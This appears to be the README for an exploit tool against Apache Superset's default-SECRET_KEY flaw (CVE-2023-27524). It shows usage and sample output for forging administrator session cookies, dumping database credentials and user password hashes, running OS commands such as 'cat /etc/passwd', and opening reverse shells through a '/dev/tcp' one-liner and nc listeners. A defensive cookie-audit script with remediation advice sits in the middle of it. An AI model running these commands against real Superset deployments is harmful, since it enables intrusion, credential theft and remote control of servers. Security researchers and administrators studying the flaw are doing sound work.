Apache Superset, a widely used open-source data visualization and exploration tool, has been found to contain security vulnerabilities that can lead to authentication bypass and remote code execution (RCE). These vulnerabilities can allow a malicious actor to gain administrative privileges on the target server, enabling them to harvest user credentials and potentially compromise data.
The specific issue involved is an insecure default configuration vulnerability, tracked as CVE-2023-27524.
The root cause is a predictable Flask SECRET_KEY set during installation, which affects a large number of exposed Apache Superset instances. Although some mitigations have been taken, the vulnerability remains a serious concern for anyone who has not yet updated their configuration.
Official vulnerability description:
Session validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to the installation instructions allow an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value of the SECRET_KEY config.
Usage
Install the pip packages:
```
pip3 install -r requirements.txt
```
```
usage: exploit.py [-h] --url URL [--id ID] [--wordlist WORDLIST] [--validate] [--enum-dbs] [--enum-users] [--cmd CMD]
                  [--revshell REVSHELL] [--db-host]
options:
  -h, --help            show this help message and exit
  --url URL, -u URL     Host URL
  --id ID               User ID to forge session cookie for. Default=1
  --wordlist WORDLIST, -w WORDLIST
                        Specify a wordlist file (default is 10.txt)
  --validate, -v        Validate the presence of vulnerability by login attempt
  --enum-dbs, -dbs      Enumerate databases
  --enum-users, -eu     Enumerate databases
  --cmd CMD, -c CMD     Run custom OS command on the database's server.
  --revshell REVSHELL   Specify IP:Port for reverse shell
  --db-host             Run commands or open reverse shell on the database server
```
Validate the vulnerability and attempt to crack the application with a custom wordlist
```
# python3 exploit.py --url http://localhost:8088 -v -w 10k_most_common_passwords.txt
[ ] Session cookie found.
[ ] Decoded session cookie: <REDACTED>
[ ] Using '10k_most_common_passwords.txt' as a wordlist.
[ ] Superset instance is VULNERABLE to CVE-2023-27524.
[ ] Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
[ ] Forged session cookie for user 1: <REDACTED>
[ ] Superset Version: 2.0.1
[ ] Login successful. Vulnerability is validated.
```
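The validation step above boils down to one check an administrator can run against their own deployment: does a session cookie issued by the instance verify under a known default SECRET_KEY? The following is an added example (not the exploit's code) that re-implements Flask's session-cookie signature check (itsdangerous, HMAC-SHA1, salt `cookie-session`, `hmac` key derivation) for verification only; the cookie used as sample input is the user-1 cookie printed in the enumeration output on this page, and only the default key quoted on this page is listed.

```python
"""Audit check: does a Superset session cookie validate under a known default SECRET_KEY?"""
import base64
import hashlib
import hmac
import json
import zlib

# Default key quoted on this page; extend the list from a wordlist to cover other defaults.
DEFAULT_SECRET_KEYS = [b"CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET"]
# Flask signs session cookies with this fixed salt.
FLASK_SESSION_SALT = b"cookie-session"
# Sample input: the forged user-1 cookie printed in the tool output on this page.
SAMPLE_COOKIE = "eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsQ6Q.nKTBZiUq-Cu0iWSLQIUtB2W9HnM"


def _b64decode(data: str) -> bytes:
    # itsdangerous strips '=' padding from URL-safe base64; restore it before decoding.
    raw = data.encode("ascii")
    return base64.urlsafe_b64decode(raw + b"=" * (-len(raw) % 4))


def _flask_signature(secret_key: bytes, signed_value: bytes) -> bytes:
    # Flask's SecureCookieSessionInterface uses itsdangerous with key_derivation="hmac"
    # and SHA-1: derived = HMAC(secret, salt); signature = HMAC(derived, "<payload>.<ts>").
    derived = hmac.new(secret_key, FLASK_SESSION_SALT, hashlib.sha1).digest()
    return hmac.new(derived, signed_value, hashlib.sha1).digest()


def cookie_signed_with(cookie: str, secret_key: bytes) -> bool:
    """True if the cookie's signature was produced with secret_key."""
    try:
        payload, timestamp, sig = cookie.rsplit(".", 2)
        signed_value = f"{payload}.{timestamp}".encode("ascii")
        given = _b64decode(sig)
    except ValueError:  # malformed cookie or bad base64 (binascii.Error is a ValueError)
        return False
    return hmac.compare_digest(_flask_signature(secret_key, signed_value), given)


def find_default_key(cookie: str, candidates=DEFAULT_SECRET_KEYS):
    """Return the first candidate key the cookie validates under, or None if none match."""
    return next((key for key in candidates if cookie_signed_with(cookie, key)), None)


def decode_payload(cookie: str) -> dict:
    """Decode the unsigned session payload; a leading '.' marks a zlib-compressed body."""
    compressed = cookie.startswith(".")
    raw = _b64decode((cookie[1:] if compressed else cookie).split(".")[0])
    return json.loads(zlib.decompress(raw) if compressed else raw)


if __name__ == "__main__":
    print("payload:", decode_payload(SAMPLE_COOKIE))
    print("default key matched:", find_default_key(SAMPLE_COOKIE))  # None means no listed default
```

A match means anyone can mint an administrator session for the instance, and the fix is the one the advisory names: set a long random SECRET_KEY in `superset_config.py` (existing sessions become invalid, which is the intended effect).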
Enumerate databases
```
# python3 exploit.py -u http://localhost:8088 --enum-dbs
[ ] Session cookie found.
[ ] Decoded session cookie:
{'csrf_token': '5d4c9ad6caf94bc1c652b0fc8e8739d19c45c05a', 'locale': 'en'}
[ ] Using default secret keys.
[ ] Superset instance is VULNERABLE to CVE-2023-27524.
[ ] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[ ] Forged session cookie for user 1:
eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsQ6Q.nKTBZiUq-Cu0iWSLQIUtB2W9HnM
[ ] Version 2.0.1 seems vulnerable.
[ ] Enumerating databases via API...
[ ] Found database: "examples" with password "superset".
[ ] Found database: "SQLite".
[ ] Enumerating database connection data and cracking password if possible...
----------------- --------------------------------------------------- -------------------------- ----------------------
| database_name | sqlalchemy_uri                                    | password                 | decrypted_password   |
|----------------- --------------------------------------------------- -------------------------- ----------------------|
| examples      | postgresql://superset:XXXXXXXXXX@db:5432/superset | MAqp6AIikZpDM5bMH4MMgA== | superset********     |
| SQLite        | sqlite pysqlite:////app/superset_home/superset.db |                          |                      |
----------------- --------------------------------------------------- -------------------------- ----------------------
[ ] Process of enumerating databases finished.
```
Enumerate Superset users
```
# python3 exploit.py -u http://localhost:8088 --enum-users
[ ] Session cookie found.
[ ] Decoded session cookie:
{'csrf_token': '2a3adb09bac36c330a77c74da1cca27c431779e8', 'locale': 'en'}
[ ] Using default secret keys.
[ ] Superset instance is VULNERABLE to CVE-2023-27524.
[ ] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[ ] Forged session cookie for user 1:
eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsRCQ.qeci7JgO5Lb4AwexB0Qojp5RDbs
[ ] Version 2.0.1 seems vulnerable.
[ ] Checking existing metadata database connection...
[ ] Settings of database with id 1 were successfully modified.
[ ] Settings of database with id 2 were successfully modified.
[ ] Superset metadata connection is already added with id 2.
[ ] Trying to enumerate Superset users...
[ ] RESULT:
------------ --------------------------------------------------------------------------------------------------------
| username | password                                                                                               |
|------------ --------------------------------------------------------------------------------------------------------|
| admin    | pbkdf2:sha256:260000$z5y5YnluWzyx4kd2$33c40dfefdea9aedef6ed171a941492516ba49c1ed8ed740d7e05446ce639c0e |
------------ --------------------------------------------------------------------------------------------------------
```
Run a custom OS command
On the Superset server:
```
# python3 exploit.py --url http://localhost:8088 --cmd 'bash -i >& /dev/tcp/<IP>/4242 0>&1'
```
Note that in this case the command output cannot be viewed yet.
On the database server:
```
# python3 exploit.py -u http://localhost:8088 --cmd 'cat /etc/passwd' --db-host
[ ] Session cookie found.
[ ] Decoded session cookie:
{'csrf_token': 'c2154d7077f507bd69c791f9d6de49115ba290a3', 'locale': 'en'}
[ ] Using default secret keys.
[ ] Superset instance is VULNERABLE to CVE-2023-27524.
[ ] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[ ] Forged session cookie for user 1:
eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsRMw.haTjE2XBuVjamMvsdg7SemBr3Ig
[ ] Version 2.0.1 seems vulnerable.
[ ] Trying to run command on the database server...
[ ] Settings of database with id 1 were successfully modified.
[ ] $ cat /etc/passwd
-----------------------------------------------------------------------------------
| cmd_output                                                                      |
|-----------------------------------------------------------------------------------|
| root:x:0:0:root:/root:/bin/bash                                                 |
| daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin                                 |
| <REDACTED>                                                                      |
| postgres:x:999:999::/var/lib/postgresql:/bin/bash                               |
-----------------------------------------------------------------------------------
```
Open a reverse shell
On the Superset server:
```
# Terminal 1
nc -lvnp [PORT]
# Terminal 2
python3 exploit.py -u http://localhost:8088 --revshell [IP]:[PORT]
```
On the database server:
```
# Terminal 1
nc -lvnp [PORT]
# Terminal 2
python3 exploit.py -u http://localhost:8088 --revshell [IP]:[PORT] --db-host
```